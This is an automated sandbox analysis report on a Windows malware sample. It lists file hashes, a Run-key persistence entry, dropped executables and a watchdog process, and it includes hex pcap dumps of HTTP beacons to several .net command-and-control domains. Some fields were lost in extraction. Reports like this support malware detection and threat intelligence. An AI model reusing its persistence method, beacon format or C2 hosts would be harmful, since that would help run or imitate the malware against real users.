Analysis Date: 2014-10-02 16:52:26

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 2e6990f5ec97535e1a399836318d1a1b sha1: 2482b70f3dfe38fb153290621806b627f46ce4b1 size: 296448
Section .rdata md5: e3f60746ebbe546a9e71a52928627802 sha1: 31383caf164c95ab0deeb86e748348750ef48731 size: 34816
Section [name not recovered in extraction] md5: 7fcfd8de3f4121d6e05c412dea0011bd sha1: 71d8b33d99b0dcc1040c02e4f71ba768af2a10e5 size: 95232
Timestamp (PE compile time): 2014-07-24 05:05:37
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Image Connection Interactive Performance ➝
C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe

↳ C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.mnaci
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\wnewlhdh.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\itfnisqjtrhtzk\ccekywsq.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP: 192.168.1.1:1031 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1032 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1033 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1034 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1035 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1036 ➝ [destination not recovered in extraction]
Flows TCP: 192.168.1.1:1037 ➝ [destination not recovered in extraction]

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206c6561 64657262 72696768   ost: leaderbrigh
0x00000070 (00112)   742e6e65 740d0a0d 0a                  t.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20616e73 77657272 65616479   ost: answerready
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a                  .net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20676c61 73737065 6f706c65   ost: glasspeople
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a                  .net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20646966 66696375 6c747065   ost: difficultpe
0x00000070 (00112)   6f706c65 2e6e6574 0d0a0d0a            ople.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20706c65 6173616e 7470656f   ost: pleasantpeo
0x00000070 (00112)   706c652e 6e65740d 0a0d0a0a            ple.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206c6561 64657272 65616479   ost: leaderready
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a0a            .net........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f7574 6174756e 656f6e65   mail=outatuneone
0x00000020 (00032)   406d736e 2e636f6d 266d6574 686f643d   @msn.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20766172 696f7573 70656f70   ost: variouspeop
0x00000070 (00112)   6c652e6e 65740d0a 0d0a0a0a            le.net......

         (((((                  H
         h((((                  H
